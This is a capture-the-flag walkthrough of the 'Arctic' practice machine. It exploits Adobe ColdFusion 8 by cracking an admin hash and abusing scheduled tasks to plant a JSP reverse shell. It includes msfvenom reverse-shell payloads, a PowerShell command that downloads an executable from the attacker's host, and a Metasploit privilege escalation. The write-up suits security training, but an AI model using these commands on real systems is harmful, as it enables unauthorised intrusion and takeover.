Today, we’re going to solve another CTF machine “Arctic”. It is now retired box and can be accessible to VIP member.
Specifications
- Target OS: Windows
- IP Address: 10.10.10.11
- Difficulty: Easy
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -Pn --disable-arp-ping -oA 10.10.10.11.quick 10.10.10.11
135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open unknown
Enumeration
Nmap reveals unknown service running on port 8500 and if we browse the page 10.10.10.11:8500
If we browse the CFIDE/ and take a look inside administrator/ it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.
The first thing i did is tested out basic creds which i can think of such as admin:admin/admin:administrator that didn’t work so i checked page source and inspected input fields but it was useless.
After that, Google for “Adobe Coldfusion 8 CVE”
Exploit: https://www.exploit-db.com/exploits/14641
Crack SHA1 Using Hashcat
hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force
Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1
Decrypted: happyday
Goto Debugging & Logging > Scheduled Tasks
Let’s Schedule New Task.
Exploitation
This gives an ability to download a file from webserver and save it locally. Under Server Settings > Mapping, We can verify the CFIDE path. Since, our targeted machine is windows we have to create a jsp reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=1337 -f raw > shell.jsp
Task Name: Shell
URL: http://10.10.14.27:8000/shell.jsp
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Click Submit and start the listener.
Click Run Scheduled Task
After running the scheduled task we got reverse shell.
User flag can be obtained from C:\Users\tolis\Desktop\user.txt
Privilege Escalation
Since, we have low privilege shell we can try upgrading to proper shell and go for privilege escalation.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shell.exe
Transfer our shell.exe file to targeted box using powershell.
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.27:8000/shell.exe', 'shell.exe')"
And we got proper low priv reverse shell.
Since, we don’t know what to exploit for priv esc we’ll do some enumeration and the easiest way to do in metasploit is to use local_exploit_suggester module.
Module: post/multi/recon/local_exploit_suggester
We got bunch of suggestions through x86 shell but let’see what we get through x64 shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shellx64.exe
Now, that we’re x64 let’s run local_exploit_suggester again.
Not much of a difference let’s try the first one (exploit/windows/local/ms10_092_schelevator).
Look’s like it worked!
